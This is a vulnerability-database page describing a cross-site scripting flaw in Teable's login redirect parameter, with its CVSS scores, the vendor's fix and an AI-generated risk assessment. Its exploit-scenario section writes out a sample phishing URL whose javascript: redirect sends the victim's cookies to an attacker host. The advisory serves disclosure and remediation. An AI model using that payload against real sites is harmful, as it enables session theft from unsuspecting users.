EUVD-2026-31906
GHSA-6mmc-c65c-3cjp
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
4DescriptionCVE.org
A vulnerability was identified in teableio teable up to 1.9.x. This impacts an unknown function of the file apps/nextjs-app/src/features/auth/pages/LoginPage.tsx of the component Sign-up. The manipulation of the argument redirect leads to cross site scripting. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Upgrading to version release.2026-04-21T08-57-20Z.1513 will fix this issue. The affected component should be upgraded. The vendor confirms: "The default branch of teableio/teable is develop, and the reported login redirect issue has already been fixed there. The login redirect flow now validates the redirect parameter with isValidRedirectPath() before navigation, which blocks javascript:, data:, and cross-origin redirects."
AnalysisAI
Cross-site scripting in Teable's authentication redirect flow (versions 1.0-1.9.x) allows a remote unauthenticated attacker to inject and execute arbitrary JavaScript in a victim's browser by crafting a login URL with a malicious redirect parameter using javascript: or data: URI schemes. The vulnerable component is LoginPage.tsx in the Next.js frontend and the social auth controller adapter in the NestJS backend, neither of which validated the redirect destination before navigating. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that the victim click an attacker-crafted login or sign-up URL containing a malicious value in the `redirect` query parameter (e.g., javascript: or data: URI scheme), and then successfully complete the Teable authentication flow on that page. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 score of 2.1 accurately reflects the constrained real-world risk: the vector (AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N) shows network-reachable and low-complexity exploitation but mandates user interaction (UI:P) and yields only low integrity impact with zero confidentiality or availability consequence. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker sends a victim a phishing link to the Teable login page with a crafted `redirect` parameter such as `https://teable.example.com/login?redirect=javascript:fetch('https://attacker.example/steal?c='+document.cookie)`. When the victim authenticates, the application follows the unvalidated redirect, executing the attacker's JavaScript payload in the victim's browser session. … |
| Remediation | Upgrade to the vendor-released patch version release.2026-04-21T08-57-20Z.1513, available at https://github.com/teableio/teable/releases/tag/release.2026-04-21T08-57-20Z.1513. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Share
External POC / Exploit Code
Leaving vuln.today